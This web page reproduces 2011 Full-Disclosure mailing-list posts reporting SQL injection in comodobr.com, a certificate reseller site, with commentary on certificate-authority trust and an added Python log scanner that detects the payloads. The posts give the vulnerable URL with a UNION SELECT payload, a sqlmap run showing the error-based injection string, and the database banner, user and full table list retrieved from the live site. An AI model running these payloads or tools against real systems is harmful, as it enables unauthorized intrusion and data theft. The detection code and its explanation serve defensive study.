- Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
- Sun, 22 May 2011 11:20:54 PDT
- X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
- Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
- From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles@ymail.com>
- X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
- Cc: suporte@comodobr.com
- Subject: [Full-disclosure] comodobr.com sqli
- vulnerable link:
- https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
- http://pastebin.com/9qwdL1pA
- _______________________________________________
- Full-Disclosure - We believe in it.
- Charter: http://lists.grok.org.uk/full-disclosure-charter.html
- Hosted and sponsored by Secunia - http://secunia.com/
- ---------------------------------------------------------------------
- PS C:\Python27> nslookup 199.48.147.35
- Server: google-public-dns-a.google.com
- Address: 8.8.8.8
- Name: tor-exit-router35-readme.formlessnetworking.net
- Address: 199.48.147.35
- >>> You're not going to find him... <<<
- >>> Let's check the host: <<<>>><<<>>><
- PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 21:00:00
- Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
- POST data (--data) [Enter for None]:
- Injection difficulty (--level/--risk). Please choose:
- [1] Normal (default)
- [2] Medium
- [3] Hard
- > 1
- Enumeration (--banner/--current-user/etc). Please choose:
- [1] Basic (default)
- [2] Smart
- [3] All
- > 1
- sqlmap is running, please wait..
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: prod
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198) THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- ---
- [21:00:00] [INFO] retrieved: 5.0.91-community-log
- web application technology: PHP 5.2.6, Apache 2.0.63
- back-end DBMS: MySQL 5.0
- banner: '5.0.91-community-log'
- [21:00:00] [INFO] retrieved: comodobr_site@localhost
- current user: 'comodobr_site@localhost'
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- current database: 'comodobr_comodobr'
- current user is DBA: 'False'
- [*] shutting down at: 21:00:00
- PS C:\Python27>
- >>> Looks real <<<>>><<<>>><<<>>><<<>>>
- >>> Let's see the inside of the db: <<<
- web application technology: PHP 5.2.6, Apache 2.0.63
- back-end DBMS: MySQL 5.0
- banner: '5.0.91-community-log'
- current user: 'comodobr_site@localhost'
- current database: 'comodobr_comodobr'
- current user is DBA: 'False'
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_associa
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_categoria
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_importado
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_status
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_confirm_pago
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_contab
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_expected_delivery_time
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_hosting_contas
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_meios_pago
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedido_status
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedido_status_codes
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedidos
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedidos_historico
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_prod_grupos
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_prods
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_resellers
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_server_software
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_users
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_webhostreport_item
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
- Database: comodobr_comodobr
- [22 tables]
- +-------------------------------+
- | comodo_boleto |
- | comodo_boleto_associa |
- | comodo_boleto_categoria |
- | comodo_boleto_importado |
- | comodo_boleto_status |
- | comodo_confirm_pago |
- | comodo_contab |
- | comodo_expected_delivery_time |
- | comodo_hosting_contas |
- | comodo_meios_pago |
- | comodo_pedido_status |
- | comodo_pedido_status_codes |
- | comodo_pedidos |
- | comodo_pedidos_historico |
- | comodo_prod_grupos |
- | comodo_prods |
- | comodo_resellers |
- | comodo_server_software |
- | comodo_users |
- | comodo_vw_crm_clientes |
- | comodo_webhostreport_item |
- | comodo_webhostreport_subitem |
- +-------------------------------+
- [*] shutting down at: 21:00:00
- PS C:\Python27>
- When are Comodo going to fix this? How come Comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from PayPal, Google, etc? Why does Firefox restore all my CAs when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?
- GET YOUR SHIT TOGETHER.
- EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
- I've just checked his claims, which were true. Everyone can claim that they hacked Comodo, but that the vulnerability was fixed, so all I have done is open sqlmap and test :-)
- Also here's a new response:
- Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
- Tue, 24 May 2011 14:58:39 PDT
- X-Mailer: YahooMailWebService/0.8.111.303096
- Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
- From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
- Cc: "support@comodobr.com" <support@comodobr.com>
- Subject: [Full-disclosure] My comments on comodobr.com
- I have to agree with Comodo president and CEO, Melih Abdulhayoglu.
- In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
- However, the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten their own security. Further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.
- Just my 50 cents
- [Edit]
- The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSRs and client info shouldn't be "readily available" like this.
- No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
- That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.
- http://pastebin.com/MFSUdCnk
- _______________________________________________
- Full-Disclosure - We believe in it.
- Hosted and sponsored by Secunia - http://secunia.com/
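The post above notes that anyone with sqlmap could have found this, which is also why both probes leave recognisable traces in the web server's access log: the manual `UNION ALL SELECT` from the first message and the sqlmap error-based payload (`CHAR(...)` markers, `FLOOR(RAND(0)*2)` with `GROUP BY` over `information_schema.tables`) that the wizard run reported. The scanner below is an added example, not code from the paste or from any of the people quoted; the three Apache combined-format log lines are constructed (documentation-range IP, timestamps mirroring the page), and the signature names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (Apache combined format). Line 1 is a normal request,
# line 2 carries the UNION payload from the first message, line 3 the
# sqlmap error-based payload from the wizard run.
SAMPLE_LOG = """\
203.0.113.5 - - [22/May/2011:11:20:54 -0700] "GET /comprar/compra_codesigning.php?prod=8 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [22/May/2011:11:21:10 -0700] "GET /comprar/compra_codesigning.php?prod=8%20UNION%20ALL%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14%20--%20- HTTP/1.1" 200 6210 "-" "Mozilla/5.0"
203.0.113.5 - - [22/May/2011:21:00:00 -0700] "GET /comprar/compra_codesigning.php?prod=8%20AND%20(SELECT%201198%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT%20(CASE%20WHEN%20(1198=1198)%20THEN%201%20ELSE%200%20END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 812 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures applied to the URL-decoded, normalised parameter value.
# Names are this example's own, not a vendor rule set.
SIGNATURES = {
    # manual or tool-generated UNION query
    "union_select": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    # MySQL duplicate-key trick: FLOOR(RAND()) grouped over information_schema
    "mysql_dup_key": re.compile(
        r"(?=.*\binformation_schema\b)(?=.*\bFLOOR\s*\(\s*RAND\s*\()", re.I | re.S),
    # CHAR(n,n,n,...) lists used to build marker strings inside error text
    "mysql_char_marker": re.compile(r"\bCHAR\s*\(\s*\d+\s*(?:,\s*\d+\s*){2,}\)", re.I),
}


def normalize(value):
    # Drop inline /* */ comments (a common keyword-splitting trick) and
    # collapse whitespace so the signatures see one canonical form.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip()


def inspect_request(target):
    """Return {param_name: [matched signature names]} for a request target."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        norm = normalize(value)
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(norm)]
        if matched:
            hits[name] = matched
    return hits


def scan_log(text):
    """Return one finding per log line that carries a signature or a scanner UA."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = inspect_request(m["target"])
        scanner_ua = "sqlmap" in m["ua"].lower()
        if hits or scanner_ua:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "params": hits, "scanner_ua": scanner_ua,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Signature matching is a tripwire, not a control: it catches the exact shapes seen here and a few trivial evasions (URL encoding, `/**/` splitting), while the real fix is the parameterised query on the application side. The strongest single indicator in a log like this is a 5xx response paired with `information_schema` in a parameter, since error-based extraction depends on the database error reaching the client.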
- PS C:\Users\Nicolai> nslookup 199.48.147.35
- Server: google-public-dns-a.google.com
- Address: 8.8.8.8
- Name: tor-exit-router35-readme.formlessnetworking.net
- Address: 199.48.147.35
- PS C:\Users\Nicolai>